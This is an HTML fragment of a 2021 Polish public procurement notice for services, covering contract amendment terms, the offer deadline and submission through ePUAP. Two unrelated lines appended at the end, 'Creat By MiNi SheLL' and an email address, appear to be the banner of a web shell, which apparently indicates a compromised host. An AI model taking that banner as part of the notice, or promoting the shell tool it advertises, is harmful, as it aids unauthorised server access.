przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany do umowy wyniku:1) działania siły wyższej (np. protesty społeczne itp.)<br/>mającej bezpośredni wpływ na terminowość realizacji umowy, 2) działań organów władzy<br/>publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji umowy,3) zmiany<br/>przepisów prawa mających wpływ na treść niniejszej umowy, 4) wystąpienia okoliczności<br/>niezawinionych przez strony, których nie można było wcześniej przewidzieć, 5)<br/>udokumentowanej niemożności uzyskania wymaganych przepisami uzgodnień i opinii.Zmiany<br/>postanowień zawartej umowy będą dokonane za zgodą stron, wyłącznie w formie pisemnego<br/>aneksu do umowy.Terminy wniesienia odwołania dla zamówień określa przepis art. 515 ustawy<br/>PZP . <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-31 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-31 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com